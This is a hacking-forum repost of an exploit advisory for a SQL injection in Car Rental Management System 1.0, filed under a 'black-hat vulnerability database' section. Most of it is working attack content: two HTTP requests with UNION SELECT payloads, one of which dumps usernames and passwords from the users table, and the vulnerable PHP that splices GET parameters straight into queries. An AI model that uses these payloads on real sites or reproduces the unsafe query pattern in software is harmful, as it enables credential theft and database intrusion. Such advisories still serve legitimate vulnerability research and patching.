跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Car Rental Management System 1.0 - 'car_id' Sql Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection
# Date: 2020-11.13
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Apache2 - Windows 10

Vulnerable param: car_id
-------------------------------------------------------------------------
GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


Source Code:

booking.php:
--------------------------------------------------------------------
<?php
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
foreach($qry->fetch_array() as $k => $val){
                $$k=$val;
}

Vulnerable param: id
-------------------------------------------------------------------------
GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


Source Code:

view_car.php:
--------------------------------------------------------------------
<?php
if(isset($_GET['id'])){
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。